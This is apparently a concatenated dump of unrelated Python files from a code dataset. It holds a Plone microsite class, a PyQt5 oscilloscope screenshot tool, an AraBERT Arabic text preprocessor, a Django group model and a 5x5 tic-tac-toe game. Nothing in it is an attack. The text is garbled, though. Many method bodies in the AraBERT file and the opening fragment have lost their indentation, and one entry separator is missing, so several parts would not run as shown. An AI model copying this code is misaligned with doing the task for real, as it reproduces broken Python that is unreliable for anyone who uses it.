        # print (sent / (1024 * 1024)) * 100.0 / (size / (1024 * 1024))
        c.logger.info('PROVSW: Copy file <%s> progress <%s>', filename,
                      (sent / (1024 * 1024)) * 100.0 / (size / (1024 * 1024)))
        #with SoftwareTask.sample_devices_lock:
        #    SoftwareTask.sample_devices[dev.facts['serialnumber']].deviceTasks.taskState['Software'] = (sent / (1024 * 1024)) * 100.0 / (size / (1024 * 1024)))
def post_run_task(self):
with SoftwareTask.sample_devices_lock:
if self.sample_device.deviceSerial in SoftwareTask.sample_devices:
del SoftwareTask.sample_devices[self.sample_device.deviceSerial]
|
2,905 | 3d5d88edca5d746b830363cc9451bda94c1d7aa4 | # -*- coding: utf-8 -*-
from plone import api
from plone.dexterity.content import Container
from sc.microsite.interfaces import IMicrosite
from zope.interface import implementer
@implementer(IMicrosite)
class Microsite(Container):
    """A microsite."""

    def getLocallyAllowedTypes(self):
        """Return the portal type infos that may be added inside this microsite.

        By now we allow all allowed types without constrain.
        TODO: fully implement ISelectableConstrainTypes
        """
        types_tool = api.portal.get_tool('portal_types')
        own_type_info = types_tool.getTypeInfo(self)
        allowed = []
        for type_info in types_tool.listTypeInfo():
            if own_type_info.allowType(type_info.getId()) and type_info.isConstructionAllowed(self):
                allowed.append(type_info)
        return allowed

    def getImmediatelyAddableTypes(self, context=None):
        """Return the types immediately addable here (same as locally allowed).

        By now we allow all allowed types without constrain.
        TODO: fully implement ISelectableConstrainTypes
        """
        return self.getLocallyAllowedTypes()
|
2,906 | 33464f19c42d1a192792a73297f4d926df78ab71 | # -*- coding: utf-8 -*-
"""
Created on 11/03/2020
@author: stevenp@valvesoftware.com
"""
import sys
from PyQt5.QtWidgets import (QApplication, QWidget, QLabel, QRadioButton, QVBoxLayout, QCheckBox, QProgressBar,
QGroupBox, QComboBox, QLineEdit, QPushButton, QMessageBox, QInputDialog, QDialog, QDialogButtonBox, QSlider, QGridLayout, QHBoxLayout)
from PyQt5.QtGui import QIcon, QPainter, QPen, QFont, QPixmap
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QCoreApplication, QObject, QRunnable, QThread, QThreadPool, pyqtSignal, pyqtSlot
#append the relative location you want to import from
sys.path.append("../Instrument_Libraries")
from instrumentConfig import Instrument
#For some reason the following code needs to be here for the Steam icon to show on the taskbar.
#Google code, don't know why.
import ctypes
# Give the process an explicit AppUserModelID so Windows associates the
# taskbar icon with this app rather than the python.exe host.
# NOTE(review): ctypes.windll is Windows-only; this will raise on other OSes.
myappid = u'mycompany.myproduct.subproduct.version' # arbitrary string
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
class MainWindow(QWidget):
    """Main widget: pick an instrument, initialize it, and grab scope shots."""
    # Class-level defaults; instance attributes shadow these once set.
    instrumentName = "Unitialized Instrument"
    instrumentList = []
    #Instrument Types is a dictionary
    instrumentTypes = {}
    instrumentKey = "Uninitialized Key"

    def __init__(self):
        super(MainWindow, self).__init__()
        # Instrument discovery/config helper from Instrument_Libraries.
        self.configInstrument = Instrument()
        self.instrumentList = self.configInstrument.listInstruments()
        self.instrumentTypes = self.configInstrument.listInstrumentTypes()
        self.initUI()

    def initUI(self):
        """Build the UI: instrument chooser, action buttons, image area."""
        self.setGeometry(300, 300, 500, 600)
        self.setWindowTitle('Tektronix Channel Label Widget')
        self.setWindowIcon(QIcon('Steam_icon_logo.gif'))
        # Instrument selection group: combo box, init button, IDN labels.
        instrumentGroupBox = QGroupBox()
        instrumentGrid = QGridLayout()
        self.scopeComboBox = QComboBox()
        for index in range (0, len(self.instrumentList)):
            self.scopeComboBox.addItem(self.instrumentList[index].rstrip())
        instrumentGrid.addWidget(self.scopeComboBox, 0, 0)
        self.initScopeButton = QPushButton('Initialize Scope', self)
        self.initScopeButton.clicked[bool].connect(self.initScope)
        instrumentGrid.addWidget(self.initScopeButton, 1, 0)
        scopeLabel = QLabel(self)
        scopeLabel.setText("Scope Type")
        instrumentGrid.addWidget(scopeLabel, 2, 0)
        self.scopeIDN = QLabel(self)
        self.scopeIDN.setText(self.instrumentName)
        instrumentGrid.addWidget(self.scopeIDN, 3, 0)
        instrumentGroupBox.setLayout(instrumentGrid)
        # NOTE(review): duplicate setLayout call below — harmless but redundant.
        instrumentGroupBox.setLayout(instrumentGrid)
        # Action buttons: connection test + scope shot (disabled until init).
        startButtonGroupBox = QGroupBox()
        startButtonLayout = QHBoxLayout()
        self.startStopButton = QPushButton('Test Scope Connection', self)
        self.startStopButton.clicked[bool].connect(self.startStopTest)
        self.startStopButton.setEnabled(False)
        startButtonLayout.addWidget(self.startStopButton)
        self.getScopeShot = QPushButton('Get Scope Shot', self)
        # Image display area for captured screenshots.
        pictureGroupBox = QGroupBox()
        pictureLayout = QHBoxLayout()
        self.pictLabel = QLabel(self)
        pictureLayout.addWidget(self.pictLabel)
        pictureGroupBox.setLayout(pictureLayout)
        self.getScopeShot.clicked[bool].connect(self.scopeShot)
        self.getScopeShot.setEnabled(False)
        startButtonLayout.addWidget(self.getScopeShot)
        startButtonGroupBox.setLayout(startButtonLayout)
        # Stack the three groups vertically.
        grid = QGridLayout()
        grid.addWidget(instrumentGroupBox, 0, 0)
        grid.addWidget(startButtonGroupBox, 1, 0)
        grid.addWidget(pictureGroupBox, 2, 0)
        self.setLayout(grid)
        self.show()

    def initScope(self):
        """Initialize the scope and enable the action buttons."""
        self.instrumentName = self.scopeComboBox.currentText()
        # self.scope, self.scopeName = self.configInstrument.initInstrument(self.instrumentName)
        # NOTE(review): looks like a debug leftover — the combo-box selection
        # is ignored and a fixed IP is used instead; confirm before shipping.
        self.scope, self.scopeName = self.configInstrument.initInstrument("172.18.18.24")
        print ("Configured Scope: " + self.scopeName)
        self.scopeIDN.setText(self.scopeName)
        self.startStopButton.setEnabled(True)
        self.getScopeShot.setEnabled(True)

    def startStopTest(self):
        """Exercise the scope: enable all channels, bandwidth limits, trigger."""
        self.scope.setState(1, "ON")
        self.scope.setState(2, "ON")
        self.scope.setState(3, "ON")
        self.scope.setState(4, "ON")
        self.scope.setBandwidth(1, "ON")
        self.scope.setBandwidth(2, "ON")
        self.scope.setBandwidth(3, "ON")
        self.scope.setBandwidth(4, "ON")
        #Siglent library hard codes trigger level to mV
        self.scope.setEdgeTrigger(3, 50, "FALL")

    def scopeShot(self):
        """Capture the scope screen to a PNG file and display it in the label."""
        print ("Get Scope Shot")
        self.scope.clear()
        print ("ReadIDN Returns: " + str(self.scope.readIDN()))
        print ("next line")
        self.scope.clear()
        self.scope.scopeScreenCaptureCopyToPC("siglentImage.png")
        # loading image
        self.pixmap = QPixmap("siglentImage.png")
        # adding image to label
        self.pictLabel.setText("Image Here")
        self.pictLabel.setPixmap(self.pixmap)
        # Optional, resize label to image size
        self.pictLabel.resize(self.pixmap.width(),
                              self.pixmap.height())
if __name__ == '__main__':
    # Reuse an existing QApplication if one is already running (e.g. when
    # launched from an interactive session); otherwise create one.
    app = QCoreApplication.instance()
    if app is None:
        app = QApplication(sys.argv)
    ex = MainWindow()
    app.exec_()
|
2,907 | 6c3f60f05adbebe521ba08d7a7e9fc10b1cc914f | import html
import logging
import re
import pyarabic.araby as araby
# Model identifiers (without the "aubmindlab/" prefix) this preprocessor
# knows how to handle.
ACCEPTED_MODELS = [
    "bert-base-arabertv01",
    "bert-base-arabert",
    "bert-base-arabertv02",
    "bert-base-arabertv2",
    "bert-large-arabertv02",
    "bert-large-arabertv2",
    "araelectra-base",
    "araelectra-base-discriminator",
    "araelectra-base-generator",
    "aragpt2-base",
    "aragpt2-medium",
    "aragpt2-large",
    "aragpt2-mega",
]
# Subset of ACCEPTED_MODELS whose pipelines additionally require Farasa
# segmentation of the input text.
SEGMENTED_MODELS = [
    "bert-base-arabert",
    "bert-base-arabertv2",
    "bert-large-arabertv2",
]
class ArbertmoPreprocessor:
    """
    A preprocessor class that cleans and preprocesses text for all models in
    the AraBERT repo. It can also unprocess the output of generated text.

    Args:
        model_name (:obj:`str`): model name from the HuggingFace Models page
            without the "aubmindlab" tag. Defaults to "bert-base-arabertv02".
            Must be one of ``ACCEPTED_MODELS``; the models listed in
            ``SEGMENTED_MODELS`` additionally apply Farasa segmentation, the
            others do not.
        keep_emojis(:obj: `bool`): don't remove emojis while preprocessing.
            Defaults to False.
        remove_html_markup(:obj: `bool`): whether to remove HTML artifacts;
            should be set to False when preprocessing TyDi QA. Defaults to True.
        replace_urls_emails_mentions(:obj: `bool`): whether to replace email
            URLs and mentions by special tokens. Defaults to True.
        strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN,
            KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA).
        strip_tatweel(:obj: `bool`): remove tatweel '\\u0640'.
        insert_white_spaces(:obj: `bool`): insert whitespace before and after
            all non Arabic digits or English digits or Arabic and English
            alphabet or the 2 brackets, then insert whitespace between words
            and numbers or numbers and words.
        remove_elongation(:obj: `bool`): replace repetition of more than 2
            non-digit characters with 2 of this character.

    Returns:
        ArbertmoPreprocessor: the preprocessor class.

    Example:
        from preprocess import ArbertmoPreprocessor
        arabert_prep = ArbertmoPreprocessor("aubmindlab/bert-base-arabertv2")
        arabert_prep.preprocess("SOME ARABIC TEXT")
    """
def __init__(
    self,
    model_name,
    keep_emojis=False,
    remove_html_markup=True,
    replace_urls_emails_mentions=True,
    strip_tashkeel=True,
    strip_tatweel=True,
    insert_white_spaces=True,
    remove_elongation=True,
):
    """Configure the preprocessor.

    See the class docstring for the meaning of every argument and the list
    of accepted model names. Unknown model names fall back to
    "bert-base-arabertv02" with a warning.
    """
    model_name = model_name.replace("aubmindlab/", "")
    if model_name not in ACCEPTED_MODELS:
        logging.warning(
            "Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation"
        )
        self.model_name = "bert-base-arabertv02"
    else:
        self.model_name = model_name
    if self.model_name in SEGMENTED_MODELS:
        logging.info(
            "Selected Model requires pre-segmentation, Initializing FarasaSegmenter"
        )
        try:
            from farasa.segmenter import FarasaSegmenter

            self.farasa_segmenter = FarasaSegmenter(interactive=True)
        # Fix: was a bare "except:", which also swallows SystemExit and
        # KeyboardInterrupt. Narrowed to Exception (the segmenter can fail
        # for reasons other than ImportError, e.g. a missing Java runtime).
        except Exception:
            logging.warning(
                "farasapy is not installed, you won't be able to process text for AraBERTv1 and v2. Install it using: pip install farasapy"
            )
    else:
        logging.info(
            "Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization"
        )
    self.keep_emojis = keep_emojis
    if self.keep_emojis:
        # Imported lazily so the emoji package is only required when used.
        import emoji

        self.emoji = emoji
        if self.model_name in SEGMENTED_MODELS:
            logging.warning(
                "Keeping tweets with Farasa Segmentation is 10 times slower"
            )
    self.remove_html_markup = remove_html_markup
    self.replace_urls_emails_mentions = replace_urls_emails_mentions
    self.strip_tashkeel = strip_tashkeel
    self.strip_tatweel = strip_tatweel
    self.insert_white_spaces = insert_white_spaces
    self.remove_elongation = remove_elongation
def preprocess(self, text):
    """
    Preprocess takes an input text line and applies the same preprocessing
    used in AraBERT pretraining.

    Args:
        text (:obj:`str`): input text string

    Returns:
        string: A preprocessed string depending on which model was selected
    """
    # v1 models use the legacy pipeline.
    if self.model_name == "bert-base-arabert":
        return self._old_preprocess(
            text,
            do_farasa_tokenization=True,
        )
    if self.model_name == "bert-base-arabertv01":
        return self._old_preprocess(text, do_farasa_tokenization=False)
    text = str(text)
    text = html.unescape(text)
    if self.strip_tashkeel:
        text = araby.strip_tashkeel(text)
    if self.strip_tatweel:
        text = araby.strip_tatweel(text)
    if self.replace_urls_emails_mentions:
        # replace all possible URLs with the [رابط] token
        for reg in url_regexes:
            text = re.sub(reg, " [رابط] ", text)
        # replace emails with the [بريد] token
        for reg in email_regexes:
            text = re.sub(reg, " [بريد] ", text)
        # replace mentions with the [مستخدم] token
        text = re.sub(user_mention_regex, " [مستخدم] ", text)
    if self.remove_html_markup:
        # remove html line breaks
        text = re.sub("<br />", " ", text)
        # remove html markup
        text = re.sub("</?[^>]+>", " ", text)
    # remove repeated characters >2
    if self.remove_elongation:
        text = self._remove_elongation(text)
    # insert whitespace before and after all non Arabic digits or English
    # digits and alphabet and the 2 brackets
    if self.insert_white_spaces:
        text = re.sub(
            "([^0-9\u0621-\u063A\u0641-\u064A\u0660-\u0669a-zA-Z\[\]])",
            r" \1 ",
            text,
        )
        # insert whitespace between words and numbers or numbers and words
        text = re.sub(
            "(\d+)([\u0621-\u063A\u0641-\u064A\u0660-\u066C]+)", r" \1 \2 ", text
        )
        text = re.sub(
            "([\u0621-\u063A\u0641-\u064A\u0660-\u066C]+)(\d+)", r" \1 \2 ", text
        )
    # remove unwanted characters (keeping emoji codepoints when requested)
    if self.keep_emojis:
        emoji_regex = "".join(list(self.emoji.UNICODE_EMOJI["en"].keys()))
        rejected_chars_regex2 = "[^%s%s]" % (chars_regex, emoji_regex)
        text = re.sub(rejected_chars_regex2, " ", text)
    else:
        text = re.sub(rejected_chars_regex, " ", text)
    # remove extra spaces (and the emoji variation selector U+FE0F)
    text = " ".join(text.replace("\uFE0F", "").split())
    if (
        self.model_name == "bert-base-arabertv2"
        or self.model_name == "bert-large-arabertv2"
    ):
        if self.keep_emojis:
            # Farasa cannot segment emojis, so segment word by word and
            # pass emojis through untouched.
            new_text = []
            for word in text.split():
                if word in list(self.emoji.UNICODE_EMOJI["en"].keys()):
                    new_text.append(word)
                else:
                    new_text.append(self.farasa_segmenter.segment(word))
            text = " ".join(new_text)
        else:
            text = self.farasa_segmenter.segment(text)
        return self._farasa_segment(text)
    # All the other models don't require Farasa segmentation
    return text
def unpreprocess(self, text, desegment=True):
"""Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.
The objective is to make the generated text of any model appear natural and not preprocessed.
Args:
text (str): input text to be un-preprocessed
desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. Defaults to True.
Returns:
str: The unpreprocessed (and possibly Farasa-desegmented) text.
"""
if self.model_name in SEGMENTED_MODELS and desegment:
text = self.desegment(text)
# removes the spaces around quotation marks ex: i " ate " an apple --> i "ate" an apple
# https://stackoverflow.com/a/53436792/5381220
text = re.sub(white_spaced_double_quotation_regex, '"' + r"\1" + '"', text)
text = re.sub(white_spaced_single_quotation_regex, "'" + r"\1" + "'", text)
text = re.sub(white_spaced_back_quotation_regex, "\`" + r"\1" + "\`", text)
text = re.sub(white_spaced_back_quotation_regex, "\—" + r"\1" + "\—", text)
# during generation, sometimes the models don't put a space after the dot, this handles it
text = text.replace(".", " . ")
text = " ".join(text.split())
# handle decimals
text = re.sub(r"(\d+) \. (\d+)", r"\1.\2", text)
text = re.sub(r"(\d+) \, (\d+)", r"\1,\2", text)
text = re.sub(left_and_right_spaced_chars, r"\1", text)
text = re.sub(left_spaced_chars, r"\1", text)
text = re.sub(right_spaced_chars, r"\1", text)
return text
def desegment(self, text):
"""
Use this function if sentence tokenization was done using
`from arabert.preprocess_arabert import preprocess` with Farasa enabled
AraBERT segmentation using Farasa adds a space after the '+' for prefixes,
and after before the '+' for suffixes
Example:
>>> desegment('ال+ دراس +ات')
الدراسات
"""
text = text.replace("+ ", "+")
text = text.replace(" +", "+")
text = " ".join([self._desegmentword(word) for word in text.split(" ")])
return text
def _desegmentword(self, orig_word: str) -> str:
"""
Word segmentor that takes a Farasa Segmented Word and removes the '+' signs
Example:
>>> _desegmentword("ال+يومي+ة")
اليومية
"""
word = orig_word.replace("ل+ال+", "لل")
if "ال+ال" not in orig_word:
word = word.replace("ل+ال", "لل")
word = word.replace("+", "")
word = word.replace("للل", "لل")
return word
def _old_preprocess(self, text, do_farasa_tokenization):
    """
    AraBERTv1 preprocessing function: diacritic stripping, special-token
    replacement, redundant-punctuation collapsing and (optionally) Farasa
    tokenization.
    """
    text = str(text)
    if self.strip_tashkeel:
        text = araby.strip_tashkeel(text)
    # drop reference patterns of the form digits/word/digits]
    text = re.sub(r"\d+\/[ء-ي]+\/\d+\]", "", text)
    # strip tatweel and normalise guillemets to plain double quotes
    text = re.sub("ـ", "", text)
    text = re.sub("[«»]", ' " ', text)
    if self.replace_urls_emails_mentions:
        # replace the [رابط] token with space if you want to clean links
        text = re.sub(regex_url_step1, "[رابط]", text)
        text = re.sub(regex_url_step2, "[رابط]", text)
        text = re.sub(regex_url, "[رابط]", text)
        text = re.sub(regex_email, "[بريد]", text)
        text = re.sub(regex_mention, "[مستخدم]", text)
    text = re.sub("…", r"\.", text).strip()
    text = self._remove_redundant_punct(text)
    if self.replace_urls_emails_mentions:
        # normalise stray spacing inside the special tokens
        text = re.sub(r"\[ رابط \]|\[ رابط\]|\[رابط \]", " [رابط] ", text)
        text = re.sub(r"\[ بريد \]|\[ بريد\]|\[بريد \]", " [بريد] ", text)
        text = re.sub(r"\[ مستخدم \]|\[ مستخدم\]|\[مستخدم \]", " [مستخدم] ", text)
    if self.remove_elongation:
        text = self._remove_elongation(text)
    if self.insert_white_spaces:
        # pad every char outside the Arabic/Latin/digit/bracket set
        text = re.sub(
            "([^0-9\u0621-\u063A\u0641-\u0669\u0671-\u0673a-zA-Z\[\]])",
            r" \1 ",
            text,
        )
    if do_farasa_tokenization:
        text = self._tokenize_arabic_words_farasa(text)
    return text.strip()
def _farasa_segment(self, text):
line_farasa = text.split()
segmented_line = []
for index, word in enumerate(line_farasa):
if word in ["[", "]"]:
continue
if word in ["رابط", "بريد", "مستخدم"] and line_farasa[index - 1] in [
"[",
"]",
]:
segmented_line.append("[" + word + "]")
continue
if "+" not in word:
segmented_line.append(word)
continue
segmented_word = self._split_farasa_output(word)
segmented_line.extend(segmented_word)
return " ".join(segmented_line)
def _split_farasa_output(self, word):
    """Split one '+'-delimited Farasa word into tokens, marking prefixes as
    "tok+" and suffixes as "+tok" using the module-level ``prefix_list`` /
    ``suffix_list``. The letter KAF ("ك") is ambiguous (it appears in both
    lists) and is disambiguated by its position in the word."""
    segmented_word = []
    temp_token = ""
    for i, c in enumerate(word):
        if c == "+":
            # if the token is KAF, it could be a suffix or prefix
            if temp_token == "ك":
                # if we are at the second token, then KAF is surely a prefix
                if i == 1:
                    segmented_word.append(temp_token + "+")
                    temp_token = ""
                # If the KAF token is between 2 tokens
                elif word[i - 2] == "+":
                    # if the previous token is prefix, then this KAF must be a prefix
                    if segmented_word[-1][-1] == "+":
                        segmented_word.append(temp_token + "+")
                        temp_token = ""
                    # else it is a suffix, this KAF could not be a second suffix
                    else:
                        segmented_word.append("+" + temp_token)
                        temp_token = ""
                # if KAF is at the end, this is handled with the statement after the loop
            elif temp_token in prefix_list:
                segmented_word.append(temp_token + "+")
                temp_token = ""
            elif temp_token in suffix_list:
                segmented_word.append("+" + temp_token)
                temp_token = ""
            else:
                # unknown token: keep it unmarked
                segmented_word.append(temp_token)
                temp_token = ""
            continue
        temp_token += c
    # flush the trailing token; only a suffix gets a leading '+'
    if temp_token != "":
        if temp_token in suffix_list:
            segmented_word.append("+" + temp_token)
        else:
            segmented_word.append(temp_token)
    return segmented_word
def _tokenize_arabic_words_farasa(self, line_input):
    """Farasa-tokenize a whole line for the v1 pipeline: segment (emoji-aware
    when keep_emojis is set), then mark prefixes/suffixes with '+' using the
    module-level prefix/suffix lists."""
    if self.keep_emojis:
        # Farasa cannot segment emojis: segment word by word and pass
        # emoji tokens through untouched.
        line_farasa = []
        for word in line_input.split():
            if word in list(self.emoji.UNICODE_EMOJI["en"].keys()):
                line_farasa.append(word)
            else:
                line_farasa.append(self.farasa_segmenter.segment(word))
    else:
        line_farasa = self.farasa_segmenter.segment(line_input).split()
    segmented_line = []
    for index, word in enumerate(line_farasa):
        # bare brackets only flag the special tokens handled next
        if word in ["[", "]"]:
            continue
        if word in ["رابط", "بريد", "مستخدم"] and line_farasa[index - 1] in [
            "[",
            "]",
        ]:
            segmented_line.append("[" + word + "]")
            continue
        segmented_word = []
        for token in word.split("+"):
            if token in prefix_list:
                segmented_word.append(token + "+")
            elif token in suffix_list:
                segmented_word.append("+" + token)
            else:
                segmented_word.append(token)
        segmented_line.extend(segmented_word)
    return " ".join(segmented_line)
def _remove_elongation(self, text):
"""
:param text: the input text to remove elongation
:return: delongated text
"""
# loop over the number of times the regex matched the text
for index_ in range(len(re.findall(regex_tatweel, text))):
elongation = re.search(regex_tatweel, text)
if elongation:
elongation_pattern = elongation.group()
elongation_replacement = elongation_pattern[0]
elongation_pattern = re.escape(elongation_pattern)
text = re.sub(
elongation_pattern, elongation_replacement, text, flags=re.MULTILINE
)
else:
break
return text
def _remove_redundant_punct(self, text):
    """Collapse every run of 2+ punctuation characters (per
    ``redundant_punct_pattern``) into a space-padded run of its distinct
    characters, keeping first-appearance order."""
    text_ = text
    result = re.search(redundant_punct_pattern, text)
    dif = 0
    while result:
        sub = result.group()
        # one copy of each distinct punctuation char, in original order
        sub = sorted(set(sub), key=sub.index)
        sub = " " + "".join(list(sub)) + " "
        text = "".join(
            (text[: result.span()[0] + dif], sub, text[result.span()[1] + dif :])
        )
        # text_ tracks the not-yet-processed remainder; dif re-aligns the
        # spans found in text_ back onto the growing text.
        text_ = "".join(
            (text_[: result.span()[0]], text_[result.span()[1] :])
        ).strip()
        dif = abs(len(text) - len(text_))
        result = re.search(redundant_punct_pattern, text_)
    text = re.sub(r"\s+", " ", text)
    return text.strip()
# Farasa prefix tokens (given both as literal Arabic and as escaped
# codepoints; duplicates are harmless for membership tests).
prefix_list = [
    "ال",
    "و",
    "ف",
    "ب",
    "ك",
    "ل",
    "لل",
    "\u0627\u0644",
    "\u0648",
    "\u0641",
    "\u0628",
    "\u0643",
    "\u0644",
    "\u0644\u0644",
    "س",
]
# Farasa suffix tokens (same duplication scheme as prefix_list).
suffix_list = [
    "ه",
    "ها",
    "ك",
    "ي",
    "هما",
    "كما",
    "نا",
    "كم",
    "هم",
    "هن",
    "كن",
    "ا",
    "ان",
    "ين",
    "ون",
    "وا",
    "ات",
    "ت",
    "ن",
    "ة",
    "\u0647",
    "\u0647\u0627",
    "\u0643",
    "\u064a",
    "\u0647\u0645\u0627",
    "\u0643\u0645\u0627",
    "\u0646\u0627",
    "\u0643\u0645",
    "\u0647\u0645",
    "\u0647\u0646",
    "\u0643\u0646",
    "\u0627",
    "\u0627\u0646",
    "\u064a\u0646",
    "\u0648\u0646",
    "\u0648\u0627",
    "\u0627\u062a",
    "\u062a",
    "\u0646",
    "\u0629",
]
# Special placeholder tokens produced during preprocessing.
other_tokens = ["[رابط]", "[مستخدم]", "[بريد]"]
# the never_split list is used with the transformers library tokenizers
# NOTE(review): "suffix_symblos" is a typo for "suffix_symbols", but the
# name is module-public and may be imported elsewhere, so it is kept.
prefix_symbols = [x + "+" for x in prefix_list]
suffix_symblos = ["+" + x for x in suffix_list]
never_split_tokens = list(set(prefix_symbols + suffix_symblos + other_tokens))
# URL patterns tried in order during preprocessing.
url_regexes = [
    r"(http(s)?:\/\/.)?(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)",
    r"@(https?|ftp)://(-\.)?([^\s/?\.#-]+\.?)+(/[^\s]*)?$@iS",
    r"http[s]?://[a-zA-Z0-9_\-./~\?=%&]+",
    r"www[a-zA-Z0-9_\-?=%&/.~]+",
    r"[a-zA-Z]+\.com",
    r"(?=http)[^\s]+",
    r"(?=www)[^\s]+",
    r"://",
]
user_mention_regex = r"@[\w\d]+"
email_regexes = [r"[\w-]+@([\w-]+\.)+[\w-]+", r"\S+@\S+"]
# Runs of 2+ punctuation characters, collapsed by _remove_redundant_punct.
redundant_punct_pattern = (
    r"([!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ【»؛\s+«–…‘]{2,})"
)
# 3+ repeats of any non-digit character (elongation).
regex_tatweel = r"(\D)\1{2,}"
# Characters NOT in the accepted alphabet; removed during preprocessing.
rejected_chars_regex = r"[^0-9\u0621-\u063A\u0640-\u066C\u0671-\u0674a-zA-Z\[\]!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ»؛\s+«–…‘]"
# Legacy (v1) URL/mention/email patterns used by _old_preprocess.
regex_url_step1 = r"(?=http)[^\s]+"
regex_url_step2 = r"(?=www)[^\s]+"
regex_url = r"(http(s)?:\/\/.)?(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)"
regex_mention = r"@[\w\d]+"
regex_email = r"\S+@\S+"
# The accepted alphabet itself (used when building the keep-emoji regex).
chars_regex = r"0-9\u0621-\u063A\u0640-\u066C\u0671-\u0674a-zA-Z\[\]!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ»؛\s+«–…‘"
# Whitespace-tightening patterns used by unpreprocess.
white_spaced_double_quotation_regex = r'\"\s+([^"]+)\s+\"'
white_spaced_single_quotation_regex = r"\'\s+([^']+)\s+\'"
white_spaced_back_quotation_regex = r"\`\s+([^`]+)\s+\`"
white_spaced_em_dash = r"\—\s+([^—]+)\s+\—"
left_spaced_chars = r" ([\]!#\$%\),\.:;\?}٪’،؟”؛…»·])"
right_spaced_chars = r"([\[\(\{“«‘*\~]) "
left_and_right_spaced_chars = r" ([\+\-\<\=\>\@\\\^\_\|\–]) "
|
2,908 | 8baf61a20a64f296304b6a7017a24f1216e3d771 | from django.db import models
from django.contrib.auth.models import User as sUser
# Visibility choices for Group.type: (stored value, human-readable label).
TYPES = (
    ('public', 'public'),
    ('private', 'private'),
)
#class GroupManager(models.Manager):
# def get_all_users(self):
# return self.extra(where=['users'])
class Group(models.Model):
    """A user group with one owner, many members and a public/private type."""

    name = models.CharField(max_length=100, default='')
    description = models.TextField()
    # NOTE(review): ForeignKey/ManyToManyField without on_delete implies
    # Django < 2.0 (on_delete became mandatory in 2.0) -- confirm the
    # targeted Django version before upgrading.
    owner = models.ForeignKey(sUser, related_name='my_own_groups')
    users = models.ManyToManyField(sUser, related_name='my_groups')
    type = models.CharField(max_length=7, choices=TYPES)
    # auto_now=True refreshes on every save; presumably a creation stamp
    # (auto_now_add) was intended -- verify before changing.
    created_at = models.DateField(auto_now=True)

    # Python 2 string hook; Python 3 would use __str__ instead.
    def __unicode__(self):
        return self.name
2,909 | 605e088beed05c91b184e26c4a5d2a97cb793759 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 10 11:08:59 2020
@author: rishi
"""
# --------- Global Variables -----------
# The game board: 25 cells ("-" = empty), row-major 5x5 layout
board = ["-" for i in range(1,26)]
# Lets us know if the game is over yet
game_still_going = True
# Tells us who the winner is ("X", "O", or None for tie / in progress)
winner = None
# Tells us who the current player is (X goes first)
current_player = "X"
# Valid positions as strings, since user input arrives as text
values = [str(i) for i in range(1, 26)]
# ------------- Functions ---------------
# Play a game of tic tac toe
def play_game():
    """Run the interactive game loop until a win or tie, then print the result."""
    # Show the initial game board
    display_board()
    # Loop until the game stops (winner or tie)
    while game_still_going:
        # Handle a turn
        handle_turn(current_player)
        # Check if the game is over
        check_if_game_over()
        # Flip to the other player
        flip_player()
    # Since the game is over, print the winner or tie
    if winner == "X" or winner == "O":
        print(winner + " won.")
    elif winner == None:
        print("Tie.")
# Display the game board to the screen
def display_board():
    """Print the 5x5 board; each row is followed by a position legend (1-25)."""
    print("\n")
    print(board[0] + " | " + board[1] + " | " + board[2] + " | " + board[3] + " | " + board[4] + " 1 | 2 | 3 | 4 | 5")
    print(board[5] + " | " + board[6] + " | " + board[7] + " | " + board[8] + " | " + board[9] + " 6 | 7 | 8 | 9 | 10")
    print(board[10] + " | " + board[11] + " | " + board[12] +" | " + board[13] + " | " + board[14] + " 11 |12 |13 |14 | 15")
    print(board[15] + " | " + board[16] + " | " + board[17] +" | " + board[18] + " | " + board[19] + " 16 |17 |18 |19 | 20")
    print(board[20] + " | " + board[21] + " | " + board[22] +" | " + board[23] + " | " + board[24] + " 21 |22 |23 |24 | 25")
    print("\n")
# Handle a turn for an arbitrary player
def handle_turn(player):
    """Prompt ``player`` for a free position (1-25) and place their mark."""
    # Get position from player
    print(player + "'s turn.")
    position = input("Choose a position from 1-25: ")
    # Whatever the user inputs, make sure it is a valid input, and the spot is open
    valid = False
    while not valid:
        # Make sure the input is a valid position string
        while position not in values:
            position = input("Choose a position from 1-25: ")
        # Get correct index in our board list
        position = int(position) - 1
        # Then also make sure the spot is available on the board
        if board[position] == "-":
            valid = True
        else:
            # position is now an int, so it fails the "in values" check
            # above and the player is re-prompted on the next pass.
            print("You can't go there. Go again.")
    # Put the game piece on the board
    board[position] = player
    # Show the game board
    display_board()
# Check if the game is over
def check_if_game_over():
    """Refresh the globals ``winner`` / ``game_still_going`` via the win and tie checks."""
    check_for_winner()
    check_for_tie()
# Check to see if somebody has won
def check_for_winner():
    """Set the global ``winner`` to "X"/"O" when any line is complete,
    or to None when nobody has won yet."""
    global winner
    # Run all three checks (each may flip game_still_going as a side
    # effect), then keep the first non-None result.
    by_row = check_rows()
    by_column = check_columns()
    by_diagonal = check_diagonals()
    winner = by_row or by_column or by_diagonal
# Check the rows for a win
def check_rows():
    """Check the five rows for a win.

    Sets the global ``game_still_going`` to False when a row is complete
    and returns the winning mark ("X"/"O"), or None when no row wins.

    Bug fix: the original return chain tested ``row_4`` twice, so a win on
    the fifth row set the game-over flag but returned None (the game was
    then reported as a tie).
    """
    global game_still_going
    # Rows start at indices 0, 5, 10, 15, 20 in the row-major board.
    for start in (0, 5, 10, 15, 20):
        row = board[start:start + 5]
        if row[0] != "-" and row.count(row[0]) == 5:
            game_still_going = False
            return row[0]
    return None
